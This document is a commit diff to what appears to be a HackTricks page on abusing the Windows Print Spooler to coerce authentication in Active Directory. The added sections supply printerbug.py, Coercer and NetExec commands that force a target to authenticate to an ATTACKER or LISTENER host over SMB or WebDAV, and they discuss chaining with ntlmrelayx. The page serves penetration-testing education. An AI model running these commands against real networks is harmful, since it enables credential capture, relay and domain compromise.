Merge pull request #2121 from HackTricks-wiki/research_update_src_windows-hardening_active-directory-methodology_printers-spooler-service-abuse_20260412_032430

Research Update Enhanced src/windows-hardening/active-direct...

Author: carlospolop

src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md

@@ -11,6 +11,9 @@
 If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
 Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
 
+Under the hood, the classic **PrinterBug** primitive abuses **`RpcRemoteFindFirstPrinterChangeNotificationEx`** over **`\\PIPE\\spoolss`**. The attacker first opens a printer/server handle and then supplies a fake client name in `pszLocalMachine`, so the target spooler creates a notification channel **back to the attacker-controlled host**. This is why the effect is **outbound authentication coercion** rather than direct code execution.\
+If you are looking for **RCE/LPE** in the spooler itself, check [PrintNightmare](printnightmare.md). This page is focused on **coercion and relay**.
+
 ### Finding Windows Servers on the domain
 
 Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
@@ -28,12 +31,27 @@ Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](h
 ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
 ```
 
-You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
+You can also use `rpcdump.py` on Linux and look for the **MS-RPRN** protocol:
 
 ```bash
 rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
 ```
 
+Or quickly test hosts from Linux with **NetExec/CrackMapExec**:
+
+```bash
+nxc smb targets.txt -u user -p password -M spooler
+```
+
+If you want to **enumerate coercion surfaces** instead of just checking whether the spooler endpoint exists, use **Coercer scan mode**:
+
+```bash
+coercer scan -u user -p password -d domain -t TARGET --filter-protocol-name MS-RPRN
+coercer scan -u user -p password -d domain -t TARGET --filter-pipe-name spoolss
+```
+
+This is useful because seeing the endpoint in EPM only tells you that the print RPC interface is registered. It does **not** guarantee that every coercion method is reachable with your current privileges or that the host will emit a usable authentication flow.
+
 ### Ask the service to authenticate against an arbitrary host
 
 You can compile [SpoolSample from here](https://github.com/NotMedic/NetNTLMtoSilverTicket).
@@ -49,6 +67,27 @@ python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
 printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 ```
 
+With **Coercer**, you can target the spooler interfaces directly and avoid guessing which RPC method is exposed:
+
+```bash
+coercer coerce -u user -p password -d domain -t TARGET -l LISTENER --filter-protocol-name MS-RPRN
+coercer coerce -u user -p password -d domain -t TARGET -l LISTENER --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx
+```
+
+### Forcing HTTP instead of SMB with WebClient
+
+Classic PrinterBug usually yields an **SMB** authentication to `\\attacker\share`, which is still useful for **capture**, **relay to HTTP targets** or **relay where SMB signing is absent**.\
+However, in modern environments, relaying **SMB to SMB** is frequently blocked by **SMB signing**, so operators often prefer to force **HTTP/WebDAV** authentication instead.
+
+If the target has the **WebClient** service running, the listener can be specified in a form that makes Windows use **WebDAV over HTTP**:
+
+```bash
+printerbug.py 'domain/username:password'@TARGET 'ATTACKER@80/share'
+coercer coerce -u user -p password -d domain -t TARGET -l ATTACKER --http-port 80 --filter-protocol-name MS-RPRN
+```
+
+This is especially useful when chaining with **`ntlmrelayx --adcs`** or other HTTP relay targets because it avoids relying on SMB relayability on the coerced connection. The important caveat is that **WebClient must be running** on the victim for the HTTP/WebDAV variant to work.
+
 ### Combining with Unconstrained Delegation
 
 If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
@@ -62,11 +101,11 @@ If an attacker has already compromised a computer with [Unconstrained Delegation
   - Pipe: \\PIPE\\spoolss
   - IF UUID: 12345678-1234-abcd-ef00-0123456789ab
   - Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx
-  - Tools: PrinterBug / PrintNightmare-family
+  - Tools: PrinterBug / SpoolSample / Coercer
 - MS-PAR (Print System Asynchronous Remote)
   - Pipe: \\PIPE\\spoolss
   - IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
-  - Opnum: 0 RpcAsyncOpenPrinter
+  - Notes: asynchronous print interface on the same spooler pipe; use Coercer to enumerate reachable methods on a given host
 - MS-EFSR (Encrypting File System Remote Protocol)
   - Pipes: \\PIPE\\efsrpc (also via \\PIPE\\lsarpc, \\PIPE\\samr, \\PIPE\\lsass, \\PIPE\\netlogon)
   - IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d
@@ -88,7 +127,8 @@ If an attacker has already compromised a computer with [Unconstrained Delegation
   - Opnum: 9 ElfrOpenBELW
   - Tool: CheeseOunce
 
-Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.
+Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.\
+For spooler abuse, **MS-RPRN opnum 65** remains the most common and best-documented primitive because the protocol specification explicitly states that the server creates a notification channel back to the client specified by `pszLocalMachine`.
 
 ### MS-EVEN: ElfrOpenBELW (opnum 9) coercion
 - Interface: MS-EVEN over \\PIPE\\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea)
@@ -175,11 +215,13 @@ _Remember that in order to crack NTLMv1 you need to set Responder challenge to "
 
 ## References
 - [Unit 42 – Authentication Coercion Keeps Evolving](https://unit42.paloaltonetworks.com/authentication-coercion/)
+- [Microsoft – MS-RPRN: RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)
 - [Microsoft – MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
 - [Microsoft – MS-EVEN: ElfrOpenBELW (Opnum 9)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1)
+- [p0dalirius – Coercer](https://github.com/p0dalirius/Coercer)
 - [p0dalirius – windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)
 - [PetitPotam (MS-EFSR)](https://github.com/topotam/PetitPotam)
 - [DFSCoerce (MS-DFSNM)](https://github.com/Wh04m1001/DFSCoerce)
 - [ShadowCoerce (MS-FSRVP)](https://github.com/ShutdownRepo/ShadowCoerce)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}